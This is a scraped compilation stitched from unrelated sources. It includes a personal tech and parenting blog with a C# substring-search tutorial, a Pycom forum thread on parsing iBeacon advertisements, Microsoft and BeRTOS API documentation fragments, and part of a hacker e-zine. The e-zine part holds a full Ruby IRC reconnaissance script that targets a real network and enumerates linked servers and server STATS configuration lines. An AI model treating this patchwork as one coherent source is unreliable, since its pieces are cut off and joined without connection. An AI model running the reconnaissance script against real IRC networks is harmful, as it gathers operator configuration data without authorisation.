The explanation behind repetition was quite enlightening. Once I read the concept it was very easy to see why my daughter is so insistent on watching the same movie for a week or two. The more she watches it the more comfortable she becomes with the story and the characters, which allows her to take in other aspects of the movie. Like building blocks.

If you're a parent of a toddler/pre-schooler then I highly recommend you read Gladwell's chapter on The Stickiness Factor from The Tipping Point. If you read just this chapter some of the discussion will be lost without context, but only around how The Stickiness Factor works inside the concept of tipping points. The child-related stuff seems to stand on its own. I extracted most of the highlights and concepts, but his explanations go in depth without getting you lost in the details.

tags: tipping+point, parenting, toddler

Windows Media Player is my music/video player of choice. WMP10 seemed to make it really easy for me to find my purchased music. At least I don't remember struggling to find it, more like "oh cool, here's a list of my downloads from MSN Music." I haven't had that same luck with WMP11. Note that MSN Music has been replaced by the Zune Marketplace for purchases, just in case you were wondering. But where is my Zune music located in WMP11?
Admittedly, it is pretty simple, but I seem to forget each time I upgrade to WMP11 on one of my multiple computers. [shrug] So here's where you can find it: I believe you will still need the Zune software installed on the machine and to log in every so often for the DRM to authenticate. A pain yes, but necessary.

ps: Yes, that's Faith Hill on the top of my Zune pile. She can sing and she's hawt!

tags: zune, operations

Microsoft's new operating system, Vista, seems to have inspired a programmer to be poetic, or at least entertainingly descriptive. Check out Chalain's first reactions to Vista in So Beautiful, So Disturbing. A very good read! Found via Dare. PS: Seriously, this is some really good stuff. Go. Read. Now.

tags: microsoft, vista, chalain

It's been a long time since I wrote my last how2 post, but this interesting little question was brought up to me recently and I figured why not throw it up here. How would you programmatically search a string to see if it contains another string? Of course I'm doing this in C#, but the logic would be applicable to any language. [NOTE: If you just want the quick way to do this then scroll to the bottom.]

Here's a visual of what I mean... We're looking to see if string1 (lookingFor) is contained anywhere within string2 (lookingIn). For example:

lookingFor = abcd
lookingIn = abcd OR efgh OR eabcdf OR eabfcd OR abceabfabcdghi

You can see that of all the options for lookingIn, lookingFor is found in #1, #3 and #5. Each of those options is of varying difficulty to traverse though.

1. abcd : Easy enough, the strings are exactly the same.
2. efgh : Easy enough, the string is nowhere to be found.
3. eabcdf : Now lookingFor is present, but it's surrounded by other letters.
4. eabfcd : A little more complicated...the individual letters from lookingFor are present, but the exact string is not present as there is another character between b and c.
5. abceabfabcdghi : Ok, now we're getting really complicated. At first we get all the way to the 3rd character from lookingFor [c] before being faced with an incorrect character. Then we start over again and get to the 2nd character. Finally, we find the full string towards the end of lookingIn.

As you can see, the cases quickly go from simple to complicated. We have to handle multiple failures while traversing the string, lookingIn, and make sure that we're finding the whole of the string, lookingFor, not just bits and pieces.

Let's see if I can explain the logic behind the code below. First of all, we want to iterate through the string we are searching through (lookingIn) to see if we can match the first letter of the string we are looking for (lookingFor). If we find the first letter then we will increase a counter [integer j below] to denote how many characters in lookingFor we have found. We then check to see if the counter is equal to the number of characters in lookingFor [the .Length property]. If so, then we have found the full string and break out of the for loop. If not, then we continue on to the next character in the string, lookingIn, trying to match it to the next character in lookingFor.

Here's the kicker: if at any point in time the current character from lookingIn does not equal the character at the position [integer j below] in lookingFor, then we reset the counter to 0 so that we start over. This is what allows case #5 above to work. It increases the counter by 1 for a, b and c then resets it to 0 when it reaches e. (One subtlety: after a failed partial match you also need to back the scan position up to just after where that partial match began, or a string like aab hiding inside aaab slips through unnoticed.)
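Not part of the original post, but the counter-based scan just described is easy to sketch in a few lines of Python. Note the rewind step (`i -= j`) after a failed partial match; a plain reset-to-zero misses inputs like "aab" inside "aaab":

```python
def contains(looking_for, looking_in):
    """Counter-based scan described above, plus the rewind step."""
    if not looking_for:
        return True
    j = 0  # how many characters of looking_for have matched so far
    i = 0
    while i < len(looking_in):
        if looking_in[i] == looking_for[j]:
            j += 1
            if j == len(looking_for):
                return True  # matched the whole string
        elif j > 0:
            # Partial match failed: rewind to just after the position
            # where this attempt started, then reset the counter.
            i -= j
            j = 0
        i += 1
    return False
```

Running it against the five sample inputs above gives True for #1, #3 and #5 and False for the other two, matching the post's walkthrough.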
Here's the full code for a console app [so you can copy/paste into your compiler and play with it]:

using System;

namespace StringInString
{
    class Program
    {
        static void Main(string[] args)
        {
            bool isContained = FindString(args[0].ToLower(), args[1].ToLower());
            Console.WriteLine(isContained.ToString());
        }

        static bool FindString(string lookingFor, string lookingIn)
        {
            int j = 0;
            bool found = false;
            for (int i = 0; i < lookingIn.Length; i++)
            {
                if (lookingIn[i].Equals(lookingFor[j]))
                {
                    j++;
                    if (j.Equals(lookingFor.Length))
                    {
                        found = true;
                        break;
                    }
                }
                else if (j > 0)
                {
                    // Back up to just after where this partial match began;
                    // a plain reset would miss cases like "aab" in "aaab".
                    i -= j;
                    j = 0;
                }
            }
            return found;
        }
    }
}

Now having gone through that exercise in logic, here are two quick ways built in to .NET:

1. Regular Expressions. Use the Regex.IsMatch method to determine if string1 is contained in string2. This method returns a boolean value. It would look like this [remember to add the using statement to the beginning of your class for System.Text.RegularExpressions]:

bool isContained = Regex.IsMatch(lookingIn, lookingFor);

2. String.IndexOf. IndexOf returns the zero-based index of the first occurrence of lookingFor, or -1 if it isn't found:

int indexFound = lookingIn.IndexOf(lookingFor);

Given the choice, I'll pick either of the methods built into the .NET framework every single day of the week! Why try to rebuild the wheel, especially when theirs is probably optimized for speed, efficiency and to avoid memory overflows. But, it's still interesting to work through the logic and see how the functions work.

A few weeks back, zefrank had a great bit about Ocean Beach [yeah, real original name], sand castles, surfers and waves. He actually does a freakishly good job of relating it back to technology. All I have to say is "dude, I wanna be a surfer!"

the show with zefrank: 02-05-07

A few months ago I was driving home from my parent's house on a dark, easy-winding, country road. It was a little after 9 o'clock at night and the pavement in front of me put me in a sort of driving trance.
I noted the tall trees blanketing each side of the road, preventing the moon from giving us much guidance. Every few seconds a house would whiz by, most of them set way back off the road with a few lights on inside or maybe one of those big fluorescent yard lights that shines over the driveway and a barn. My daughter was sleepily nodding off in the backseat behind me, her poor head bobbing up and down because the car seat doesn't recline in a very comfortable position. I was lost in thought...where was my life going, how would I handle the hardships ahead, emotions I hadn't felt in years, all running through my mind like a river pushing the edges of its banks. I was just following the easy curves of the road at a comfortable speed.

And then there were flashing lights behind me. Blue flashing lights. "Fuck!"

I walked away, well drove away, from that with my first speeding ticket in over 5 years. 50 in a 35. Fuck.

Well, after talking with some friends and doing some research online [link] I discovered that Washington State judges have the ability to defer speeding tickets. Basically, if you have a clean driving record the judge can offer to not report your ticket [so it doesn't go on your driving record] if you don't commit any further driving infractions for the next year. This can be done only once every 7 years. If you do get another ticket in the next 12 months then both go on your record! Apparently, this is completely up to the judge.

Since I had a clean record I called the Evergreen Division courthouse and asked the clerk if the judges were likely to offer deferrals. She was very nice and told me that both of their judges were proponents of the deferral program. I also asked her exactly what I needed to do in order to start/go through the process. Easy enough, just return the ticket to the address specified with the box marked that you are contesting the citation.

A few months rolled by and the day of my court appearance popped up on my calendar. Gulp! I don't care what you say, it's nerve wracking just having to be there. I have to say, it couldn't have been any easier!

I showed up at the courthouse a little early [good thing since I took a wrong turn!] and they let us [12 or so people] into the court room a few minutes early. At 9:30 the judge, Patricia L. Lyon, entered the court room and dealt first with the few people who had legal representation. These were the ones that had hired attorneys to fight the ticket. This only took about 10 minutes, but it was kind of funny. The judge made me laugh a few times...

One of the lawyers that was supposed to represent 3 clients had called in sick and someone else from his office was there to ask for a continuance [do it another day]. The District Attorney's office had brought in a speed radar specialist though and asked the court to make the defendants or their lawyer reimburse the DA's office [county I presume] for the cost. The judge had a little fun with the guy, asking him "What if you had been sick today? Would you still be asking for reimbursement? Who should pay, the lawyer for being sick? Or his clients for showing up when they were supposed to?" The DA was really squirming at that point and the judge knew she had made her point, so she flat out said, "I'm giving you a hard time to make my point. People get sick and some things are just out of our control." I couldn't help but instantly like that judge!

So then the lawyers leave the room and she explains to the rest of us sitting there that we have three options. If you want to contest the ticket then she'll hear your arguments and make a decision. If you just want to get the fine reduced then you need to change your plea to a mitigation hearing, which should be done in another room. Or, if you have a clean driving record you can take a deferral so the ticket doesn't go on your record. That last sentence was music to my ears!

She called four of us up (in alphabetical order by last name) to sit in the seats where the lawyers/defendants sit. I just happened to be first. She said good morning to me, told me that I have a perfect driving record and asked if I would like to have my ticket deferred. I replied, "most certainly!" She told the clerk to give me the paperwork, said that I could pay my $85 at the front desk and ended it with "have a good day."

Long story short [yeah I know, too late]...I got my 'get out of jail free' card today! My speeding ticket won't go on my record. My insurance won't go up [um, unless they read this I suppose]. And I can still drive for our CT vanpool.

Steve Jobs has an excellent letter, Thoughts on Music, where he discusses why iPod uses a proprietary DRM solution. The explanation isn't really anything new, but his comparison between CD sales and iTunes sales is an eye opener. Not to mention his request to the big four music companies to remove the DRM restrictions from online music. Go Steve! I agree wholeheartedly with him and his theory. I would gladly pay $1/song if it were free of restrictive software and I could play it anywhere. Right now, I'm using a Zune Subscription ($15/mo) and love it, but the flip side to that is if I ever move away from Zune then I lose all of my leased music. I certainly hope the big music companies pull their collective heads out of their collective asses sometime in the near future...I just want my music!

BillG on The Daily Show (full interview below)... I thought he did well and was pretty much his normal self. Somewhat quiet with a few subtle jokes in response to Jon's jabs. I wasn't too impressed with Jon's questions/jokes. He seemed a bit off his game, not his normal cut-to-the-quick style, but more like he was doing a top 10 of the Bill Gates Lame Joke List. Think about it, how many times a day does Bill get asked "what do you see in the future of computing?"
The interactive TV question was pretty good, but the way Jon played it was kind of corny. Oh well, Jon on a bad day is still better than most others out there.

The crazy thing though was Bill's sudden departure. If you watch the show (or any talk show for that matter), you know that after the segment ends guests typically sit with Jon and chat about whatever [he probably just asks "watching the superbowl this sunday?" with a smile on his face] while the camera pans out and they roll the credits. Bill didn't have anything to do with that nonsense. As soon as Jon said thank you, Bill stood up, shook his hand and left the stage, leaving poor Jon saying "where's he going?"

This was somewhat shocking, but as Heather points out, the Microsoft culture is pretty demanding and it's not unusual to see people [especially executives] jump up and leave a meeting as soon as it's over or even a few minutes before. They typically have meetings scheduled back-to-back and have to do this to make the most out of their day. I'm sure Bill was just thinking "thanks for your time, now on to the next gig" without intending any insult.

What I have enjoyed is Jon's subsequent bits poking fun at Bill's exit stage left. Tuesday night he played the Windows popup error bit (included below). Wednesday night he made fun of Bill walking through the production area pushing everyone out of his way on his way out (sorry I couldn't find that one on YouTube or Comedy Central, but I'll update the post as soon as I do). I especially liked the part where he tipped the guy's coffee up as he was taking a drink.

Here's the full interview: [Part 1 & Part 2 @ Comedy Central]
Tuesday night's bit: [@ Comedy Central]
Wednesday night's bit: [I couldn't find this @ Comedy Central]

Update 2.2.2007: added Wednesday night's bit.

© Copyright 2008, Tod Hilton.
http://dirtydogstink.com/blog/default,month,2007-02.aspx
Passive beacons. Currently the SiPy only seems to pick up standard BT broadcasts and not broadcasts from beacons. Is there any facility, without modifying the firmware of the beacons, to pick up the 128-bit UUID of such beacons?

@papasmurph Exactly. I've been trying to use a complex exponential relationship with some empirically based factors, but because I have different types of device, the relative numbers between device types are awful. The simplest approach is the best so far!

@alidaf You can subtract TX from RSSI to get a rough distance estimation a la iBeacon's "far", "near", "immediate", but I've learned to not trust TX for real distance measurement, as most beacon manufacturers don't understand they need to relate it to the actual power. My Beacon Writer app for Wellcore's beacons makes that adjustment though.

@papasmurph That was my initial thought, unless I could find some mutex equivalent. I'm happy with what I have working now. The key was the delay, but you also allowed me to find some more useful information from the broadcast, like the TX power. I'm seeing if I can determine the distances of the beacons from the receiver. Happy days!

@alidaf You could maybe set a global to true when entering the callback and false when leaving, and then test on that before you affect the table outside of the callback.

@papasmurph That sounds awesome but way beyond my current level. Python is proving a lot more difficult than I thought it would, but anyway, many, many thanks for your help.

@alidaf That's some of the things my CliqTags Spotter application does (and much more: geofencing, server communication, content presentation etc), developed in JavaScript for Cordova (iOS and Android), so I understand this issue. JavaScript is asynchronous and (luckily) single-threaded, so I can treat each function and whatever it does as atomic, and don't get race conditions. Maybe this is included: I also dabble with Python :).

@papasmurph Yes, that makes sense.
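The time-to-live device list and the enter/leave flag suggested in this thread can be sketched together. This is my own illustration of the pattern, not code from the thread (names like `DeviceTable` are made up); with a single-threaded MicroPython callback the crude boolean guard is workable:

```python
import time

class DeviceTable:
    """Track seen devices and expire entries after a time-to-live."""

    def __init__(self, ttl_seconds=30):
        self.ttl = ttl_seconds
        self.devices = {}         # device id -> last-seen timestamp
        self.in_callback = False  # the "global flag" guard from the thread

    def on_advertisement(self, device_id, now=None):
        # Called from the scan callback: record or refresh the device.
        self.in_callback = True
        try:
            self.devices[device_id] = time.time() if now is None else now
        finally:
            self.in_callback = False

    def prune(self, now=None):
        # Called from the main loop: skip while the callback is mid-update.
        if self.in_callback:
            return
        now = time.time() if now is None else now
        expired = [d for d, t in self.devices.items() if now - t > self.ttl]
        for d in expired:
            del self.devices[d]
```

The `now` parameter exists only to make the sketch testable; on the board you would simply call `on_advertisement(mac)` from the callback and `prune()` from the main loop.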
The reason for a mutex is that I am creating a managed list of devices that are given a time to live. Once the time to live is up, the device is removed from the list. I don't want to remove from the list if the callback is currently adding to the list, or vice versa. I can live without the callback, but since it is something I have now learned, I would like to use it properly and avoid race conditions, if they are even possible in Python. I'm coming to Python from C!

@alidaf My advice is to not use any sleeps at all, except very short ones, as the advertisement buffer is very small. 1 second is way too much. Not sure about any mutex and why you'd need it. If I want to analyze data I copy-paste text from Termite.

@papasmurph I had a 1 second sleep to make the output readable. That was enough to kill capturing the beacons. Is there an equivalent of a mutex to know when the callback is in operation? - papasmurph

@alidaf No doubt my code works fine for me. I'll test with the latest Pycom LoPy firmware. BLE should work the same on WiPy, LoPy etc. I upgraded to latest LoPy firmware. Still works.

@papasmurph For some reason, I can only detect the beacons if using the callback function.

@papasmurph Yes, I made a list of everything I can pick up to determine whether it's a beacon, feather, mobile or anything else. For some reason in my own code it just wouldn't pick up beacons. I've modified yours to include specific filters and ignore anything that is not a beacon or feather and it works fine. I just need to incorporate what works back into mine!

@alidaf Actually, I was mistaken (bad memory). The intention of the filtering is only to check that it's an iBeacon, discriminating other types of advertisements. It's not more specific than that. Do you in practice see other values for iBeacons?

@papasmurph Brilliant, thank you.

@alidaf You are right of course. I used that filter to detect my own UUID. For more details, see. That works a treat, but only if I remove the line...
if not data[5] == 0x4c and data[6] == 0x00 and data[7] == 0x02 and data[8] == 0x15:

Could you please point me in the direction of where the breakdown of the 'data' field is, i.e. you have used data[5], [6], [7], [8], [25], [27] and [29]. I also don't understand the line...

data = [b for b in device.data]

so would be grateful for any explanation here. Many thanks for the demo. Sorry for the delay in replying. I had a week off.

Many thanks for that. I'll give it a go.

@alidaf I figure the SiPy should be the same as the LoPy in this regard, so something like this:

from network import Bluetooth
import pycom
import time
import gc

pycom.heartbeat(False)

timeSleep = 0.01
timeScan = 10

bluetooth = Bluetooth()

def new_adv_event(event):
    if event.events() == Bluetooth.NEW_ADV_EVENT:
        anydata = True
        while anydata:
            device = bluetooth.get_adv()
            if device != None:
                rssi = device.rssi
                data = [b for b in device.data]
                if data[5] == 0x4c and data[6] == 0x00 and data[7] == 0x02 and data[8] == 0x15:
                    majorid = data[25] * 256 + data[26]
                    minorid = data[27] * 256 + data[28]
                    power = data[29]
                    if power > 127:
                        power -= 256
                    pycom.rgbled(0x000800)
                    print("iBeacon: " + str(rssi) + '/' + str(power) + ' (' + str(rssi - power) + ') ' + str(majorid) + '/' + str(minorid))
                else:
                    pycom.rgbled(0x000008)
                time.sleep(timeSleep)
                pycom.rgbled(0x000000)
            else:
                anydata = False

bluetooth.callback(trigger = Bluetooth.NEW_ADV_EVENT, handler = new_adv_event)

while True:
    if not bluetooth.isscanning():
        print("Restarting scan")
        bluetooth.deinit()
        bluetooth.init()
        bluetooth.start_scan(timeScan)
    time.sleep(1)
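The byte offsets used in this thread can be factored into a small, board-independent helper. This is my own sketch (the function name and the sample layout comments are mine, not from the thread); it assumes the standard iBeacon frame: Apple's company ID 0x4C 0x00, type 0x02, length 0x15, then 16 UUID bytes, a 2-byte major, a 2-byte minor, and a signed TX-power byte:

```python
def parse_ibeacon(data):
    """Return (uuid_hex, major, minor, tx_power) or None if not an iBeacon frame."""
    # Offsets match the forum snippet: flags occupy bytes 0-4, the
    # manufacturer-specific header starts at byte 5.
    if len(data) < 30:
        return None
    if not (data[5] == 0x4C and data[6] == 0x00 and data[7] == 0x02 and data[8] == 0x15):
        return None
    uuid = ''.join('{:02x}'.format(b) for b in data[9:25])   # 128-bit proximity UUID
    major = data[25] * 256 + data[26]
    minor = data[27] * 256 + data[28]
    # TX power is a signed byte: the calibrated RSSI at 1 m, in dBm.
    power = data[29] - 256 if data[29] > 127 else data[29]
    return uuid, major, minor, power
```

With the advertisement's RSSI in hand, `rssi - power` gives the same rough proximity number the snippet above prints.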
https://forum.pycom.io/topic/2018/passive-beacons
PS.js JavaScript library and REST reference

Learn about the PS.js JavaScript library and REST interface for Project Server 2013, which you can use to develop custom solutions and apps for Project 2013.

Last modified: February 22, 2013
Applies to: Project Professional 2013 | Project Server 2013

Project Server 2013 provides a JavaScript object model and a Representational State Transfer (REST) service that you can use to develop cross-browser web apps, task pane apps for Project Professional 2013, and apps for non-Windows devices that access Project Server 2013 and Project Online.

The JavaScript object model for Project Server 2013 is defined in the PS namespace in the PS.js JavaScript library. The PS.js JavaScript library is in the %ProgramFiles%\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS\PS.js file.

Project Server 2013 also provides a REST service that has equivalent APIs to the JavaScript object model and the .NET client object model. To use the REST interface, you build and send HTTP requests to the resource endpoints that represent the tasks you want to perform. REST resources correspond to Project Server objects, properties, and methods. Resource endpoint URIs and supported HTTP request types are documented with the corresponding members of the JavaScript object model.

If you're using the JavaScript object model, use the ProjectContext object as the entry point for Project Server functionality. If you're using the REST interface, use the endpoint URI (replace ServerName and pwaName in the URI).

PS namespace
Describes the objects in the JavaScript object model and the resources in the REST interface that you can use to develop custom solutions and apps for Project 2013.
https://msdn.microsoft.com/en-us/library/jj668539.aspx
hashtable.c File Reference

Portable hash table implementation. More...

#include "hashtable.h"
#include <cfg/debug.h>
#include <cfg/compiler.h>
#include <cfg/macros.h>
#include <string.h>

Go to the source code of this file.

Detailed Description

Portable hash table implementation.

Version: Id - hashtable.c 2506 2009-04-15 08:29:07Z duplo
Definition in file hashtable.c.

Function Documentation

Find an element in the hash table.
Returns: Data of the element, or NULL if no element was found for the given key.
Definition at line 273 of file hashtable.c.

Initialize (and clear) a hash table in a memory buffer.
Note: This function must be called before using the hash table. Optionally, it can be called later in the program to clear the hash table, removing all its elements.
Definition at line 202 of file hashtable.c.

Insert an element into the hash table.
Returns: true if insertion was successful, false otherwise (table is full).
Note: The key for the element to insert is extracted from the data with the hook. This means that this function cannot be called for hash tables with internal keys. If an element with the same key already exists in the table, it will be overwritten. It is not allowed to store NULL in the table. If you pass NULL as data, the function call will fail.
Definition at line 253 of file hashtable.c.

Insert an element into the hash table.
Returns: true if insertion was successful, false otherwise (table is full).
Note: If this function is called for a hash table with external keys, the key provided must match the key that would be extracted with the hook, otherwise the function will fail. If an element with the same key already exists in the table, it will be overwritten. It is not allowed to store NULL in the table. If you pass NULL as data, the function call will fail.
Definition at line 234 of file hashtable.c.

For hash tables with internal keys, compute the pointer to the internal key for a given node.
Definition at line 98 of file hashtable.c.
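The API contract documented above (init clears the table, insert overwrites a matching key and refuses NULL, find returns NULL for a missing key) can be mimicked in a few lines of Python for illustration. This is my own sketch of a fixed-capacity table with linear probing, not BeRTOS code:

```python
class FixedHashTable:
    """Toy fixed-capacity hash table with linear probing.

    Mirrors the documented C semantics: the constructor clears the table,
    insert overwrites an entry with the same key and fails for None data
    or a full table, and find returns None when a key is absent.
    """

    def __init__(self, capacity=64):
        self.capacity = capacity
        self.slots = [None] * capacity  # each slot holds (key, data) or None

    def insert(self, key, data):
        if data is None:                # like storing NULL in the C version
            return False
        idx = hash(key) % self.capacity
        for probe in range(self.capacity):
            pos = (idx + probe) % self.capacity
            slot = self.slots[pos]
            if slot is None or slot[0] == key:
                self.slots[pos] = (key, data)
                return True
        return False                    # table is full

    def find(self, key):
        idx = hash(key) % self.capacity
        for probe in range(self.capacity):
            slot = self.slots[(idx + probe) % self.capacity]
            if slot is None:
                return None             # empty slot: key not present
            if slot[0] == key:
                return slot[1]
        return None
```

The C version adds the internal/external key distinction via the hook; this sketch keeps the key explicit to stay short.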
http://doc.bertos.org/2.2/hashtable_8c.html
Go Null Yourself E-zine Issue 6 - Topics in this issue include Floating Point Numbers Suck, How Skynet Works, Defeating NX/DEP With return-to-libc and ROP, and more.

6e413cb4d2e8da2a0c030a83866d7438

- IRC (elchupathingy @ irc.gonullyourself.org #gny)
- Reddit (stormehh @ reddit.com/r/gny)

In theory, ambient noise is limited by quantum noise (caused by the quantum movements of ions). Ambient noise may be severely reduced - but never to zero - by using cryogenically cooled parametric amplifiers. Moreover, given unlimited time and memory, the (ideal) digital computer may also solve real number problems.

---------------------------------------------------------------------------

IRC_NICK = 'IRC-Recon'
# Username part of host mask to claim when registering with the network
IRC_USER = 'ircrecon'
# "Real name" or "gecos" information part of USER command in raw IRC
IRC_INFO = %q{ircrecon.rb by duper}
# Alphabetic DNS hostname or numeric IP address of target IRC server
IRC_HOST = 'irc.rizon.net.'
# Port number that the ircd is listening on, a.k.a. P:lines.
IRC_PORT = 6697
# Will this be an SSL-based TCP connection?
IS_SSL = true

## Toy with these WAIT_* globals if you experience Excess Flood, Max Sendq, etc.
# Amount of time in seconds to wait when server load is heavy
WAIT_SECS1 = 1.4
# How long to sleep after sending a large sequence of commands
WAIT_SECS2 = 2.8
# Length of grace period between keep-alive PONG messages
PONG_SECS = 8

# Label output that is not raw IRC responses with the following text
OUT_LABEL = '{(IRC-RECON)}'
# Boolean that increases output verbosity when set to true; displays the STATS
# request that is currently awaiting a response (good for large networks.)
OUT_VERBOSE = true

## Lists of local and remote raw IRC commands
# Localized raw IRC commands, i.e. those without any server name argument.
IRC_LOC_CMDS = [
  'HELP',
  'MAP',
]
# Uncommenting LIST may slow things down on large networks with many channels.
# Technically however, LIST is a localized command just like the rest.
# 'LIST', ]

# IRC network commands, i.e. raw IRC requests that take a remote server name
# as an argument. In raw IRC this appears as: "COMMAND :remote.server.name".
# Feel free to add any additional custom raw IRC commands here.. The default
# list was taken from RFC's and the response of the Unreal IRC HELPOP command.
IRC_NET_CMDS = [
  'ADMIN',
  'CREDITS',
  'DALINFO',
  'INFO',
  'LICENSE',
  'LUSERS',
  'MODULES',
  'MOTD',
  'RULES',
  'SERVLIST',
  'TIME',
  'TRACE',
  'USERS',
  'VERSION',
]

### DON'T CHANGE ANYTHING BELOW HERE UNLESS YOU KNOW WHAT YOU'RE DOING!

@@asock, @@athread, @@acount = false, false, 0

def prem_exit(astr)
  puts OUT_LABEL
  puts "#{OUT_LABEL} #{astr} signal trap received; exiting prematurely."
  puts OUT_LABEL
  @@athread.kill() if @@athread
  exit(-1)
end

Signal.trap('INT') do
  puts prem_exit('Interrupt')
end
Signal.trap('PIPE') { prem_exit('Pipe') }
Signal.trap('TERM') { prem_exit('Termination') }

def show_except(aexc = nil)
  return false if aexc.nil?
  $stderr.puts(aexc.backtrace.join("\n"))
  $stderr.puts(aexc.inspect)
  true
end

puts OUT_LABEL
puts "#{OUT_LABEL} ircrecon.rb script by duper <super@deathrow.vistech.net>"
puts "#{OUT_LABEL} #{RUBY_DESCRIPTION}"
puts OUT_LABEL

begin
  print "#{OUT_LABEL} Trying..."
  if IS_SSL
    include OpenSSL
    @@asock = TCPSocket.new(IRC_HOST, IRC_PORT)
    @@asock_context = SSL::SSLContext.new()
    @@asock_socket = SSL::SSLSocket.new(@@asock, @@asock_context)
    @@asock_socket.sync_close = true
    @@asock_socket.connect()
    @@asock = @@asock_socket
    puts %q{SSL-IRC connection established!}
    puts OUT_LABEL
    puts "#{OUT_LABEL} #{@@asock_socket.peer_cert_chain}"
    acipher = @@asock_socket.cipher
    analgo, aproto, akeysz = acipher[0], acipher[1], acipher[2]
    puts OUT_LABEL
    puts "#{OUT_LABEL} Algorithm: #{analgo} Protocol: #{aproto} Key Size: #{akeysz} bits"
  else
    @@asock = TCPSocket.new(IRC_HOST, IRC_PORT)
    puts %q{IRC connection established!}
  end
  puts OUT_LABEL
rescue Exception => e
  puts %q{'TCP connection failed!'}
  show_except(e)
  exit(-1)
end

print "#{OUT_LABEL} Connected to port #{IRC_PORT} on host #{IRC_HOST}"
print " (SSL-enabled)" if IS_SSL
puts
puts "#{OUT_LABEL} Registering client info with IRC network.."
puts OUT_LABEL

begin
  @@asock.puts('NICK ' << IRC_NICK)
  @@asock.puts('USER ' << IRC_USER << " . . :" << IRC_INFO)
rescue Exception => e
  show_except(e)
  exit(-2)
end

loop do
  l = nil
  begin
    l = @@asock.gets()
    break if !l or l.empty?
  rescue Exception => e
    puts %q{Error reading data while registering IRC client!}
    show_except(e)
    exit(-3)
  end
  puts l
  # Handle nospoof patch that deters all forms of blindly spoofing IP addresses
  if l[0,5].upcase.start_with?('PING ')
    @@asock.puts('PONG :' << l.split[1])
    puts "#{OUT_LABEL} Responded to target server's nospoof PING nonce"
    break
  end
  # Nickname already in use
  if l.include?(' 433 ')
    @@acount += 1
    @@asock.puts("NICK #{IRC_NICK}#{@@acount}")
  end
  # Read end of /MOTD, we're already registered! :-)
  if l.include?(' 376 ')
    puts "#{OUT_LABEL} Target server is not using a nospoof patch!"
    break
  end
end

@@servs, @@linez = [], []

begin
  print "#{OUT_LABEL} Enumerating linked server names:"
  @@asock.puts('LINKS')
  loop do
    l = @@asock.gets()
    next if !l or l.empty?
    x = l.split[3 .. -1]
    next if x.nil? or x.empty?
    y = l.split[0 .. 2].join(' ')
    if y.include?(' 364 ')
      @@linez << l
      @@servs << x.first
    end
    break if y.include?(' 365 ')
  end
rescue Exception => e
  puts %q{Error encountered while reading LINKS response!}
  show_except(e)
  exit(-4)
end

@@servs.each { |s| print ' ' << s }
@@linez.each { |k| puts k }
puts

puts "#{OUT_LABEL} Starting 'keep-alive' PONG sending thread"
@@athread = Thread.new() {
  begin
    loop do
      @@asock.puts('PONG :' << IRC_HOST)
      sleep(PONG_SECS)
    end
  rescue Exception => e
    puts %q{Caught exception while sending 'keep-alive' PONG message!}
    $stderr.puts(e.inspect)
    return false
  end
  true
}

puts "#{OUT_LABEL} Executing list of localized raw IRC commands"
begin
  IRC_LOC_CMDS.each { |c| @@asock.puts(c) }
rescue Exception => e
  puts %q{Unable to send local command request data to server}
  show_except(e)
  exit(-5)
end

@@load_flag, @@ahash = false, {}

# We're getting the STATS reports for the ircd.conf lines individually, so we
# don't miss any due to the server load being too high at a particular time.
# This is bound to happen consistently on a large/busy IRC network--be prepared
# to wait a while for the results.
def get_stats(achar, aserv = '')
  begin
    if aserv.nil? or aserv.empty?
      @@asock.puts('STATS ' << achar)
    else
      @@asock.puts('STATS ' << achar << ' ' << aserv)
    end
    loop do
      l = @@asock.gets()
      return false if not l or l.empty?
      # End of /STATS report
      break if l.include?(' 219 ')
      # Permission denied (not an IRC operator)
      break if l.include?(' 481 ')
      # Default /STATS response ("Unused", according to RFC2812 Section 5.1)
      break if l.include?(' 210 ')
      # Server load is temporarily too heavy
      if l.include?(' 263 ')
        if !@@load_flag
          @@load_flag = true
          print "#{OUT_LABEL} Warning: Server load is temporarily too heavy!"
          puts ' (This might take a while)'
        end
        # puts statement that was used for debugging current STATS status
        if OUT_VERBOSE
          @@ahash[achar] = Hash.new if !@@ahash[achar]
          if !@@ahash[achar][aserv]
            @@ahash[achar][aserv] = true
            puts "#{OUT_LABEL} STATS #{achar} #{aserv}"
          end
        end
        sleep(WAIT_SECS1)
        @@asock.puts('STATS ' << achar << ' ' << aserv)
      end
      puts l
    end
  rescue Exception => e
    show_except(e)
  end
  sleep(WAIT_SECS1)
  true
end

puts "#{OUT_LABEL} Executing list of remote raw IRC commands"
@@servs.each do |s|
  puts "#{OUT_LABEL} Beginning to enumerate data from #{s} ..."
  IRC_NET_CMDS.each do |c|
    begin
      @@asock.puts(c << ' ' << s)
    rescue Exception => e
      show_except(e)
    end
  end
  ('a' .. 'z').each { |x| get_stats(x, s) }
  sleep(WAIT_SECS2)
  ('A' .. 'Z').each { |x| get_stats(x, s) }
  puts "#{OUT_LABEL} Finished enumerating data from #{s}!"
end

begin
  puts "#{OUT_LABEL} Reconnaissance sequence complete on all servers!"
  print "#{OUT_LABEL} Waiting on cleanup of outstanding threads"
  @@athread.kill() if @@athread
  puts "Done!"
  puts "#{OUT_LABEL} Displaying remaining server responses, then exiting."
rescue
end

loop do
  begin
    l = @@asock.gets()
    next if !l or l.empty?
    if l.start_with?('ERROR')
      puts l
      break
    end
    x = l.split[3 .. -1]
    next if !x or x.empty?
    y = l.split[0 .. 2].join(' ')
    # Ignore erroneous STATS response codes
    next if y.include?(' 210 ') or y.include?(' 481 ') or y.include?(' 219 ')
    z = x.join(' ')
    next if not z or z.size <= 1
    z = z[1 .. -1] if z.start_with?(':')
    print '[' << y.split.first[1 .. -1] << '] '
    puts z
  rescue Exception => e
    $stderr.puts(e.inspect)
    break
  end
end

puts OUT_LABEL
puts "#{OUT_LABEL} Information gathering successful!"
puts OUT_LABEL
exit(0)

#EOF
################################################################################
#***END*OF*FILE**DUPER'S*CODE*CORNER**A*HAXNET*#PROJECTS*PRODUCTION*(TM)2011***#
################################################################################

[==================================================================================================]

-=[ 0x05 How Skynet Works: An Introduction to Neural Networks
-=[ Author: elchupathingy
-=[ IRC: irc.gonullyourself.org #gny

